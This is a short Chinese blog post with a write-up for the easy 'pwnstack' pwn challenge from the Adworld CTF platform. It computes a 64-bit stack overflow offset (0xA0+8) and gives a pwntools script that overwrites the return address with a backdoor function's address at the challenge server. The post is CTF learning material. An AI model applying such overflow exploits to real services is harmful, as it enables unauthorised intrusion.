Lufer

  • 首页
  • 编程
  • 学习笔记
  • 日常折腾
Lufer
Code the World
  1. 首页
  2. 未分类
  3. 正文

攻防世界PWN题解

2025年8月22日 71点热度 0人点赞 0条评论

难度1

pwnstack

题解

可以溢出的buf长度为160,即0xA0,die检测64位程序,因此溢出长度为0xA0+8

backdoor函数溢出后调用地址0x400763。

from pwn import *

p = remote("61.147.171.105", 62912)

payload = b'a' * 0xA0 + b'a' * 8
payload += p64(0x00400763)

p.recvline()
p.send(payload)
p.interactive()

标签: 暂无
最后更新:2025年8月22日

Lufer

新的一天开始啦

点赞

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复

文章目录
  • 难度1
    • pwnstack
      • 题解

COPYRIGHT © 2025 lufer.cc.

Theme Kratos Made By Seaton Jiang

鲁ICP备2021045819号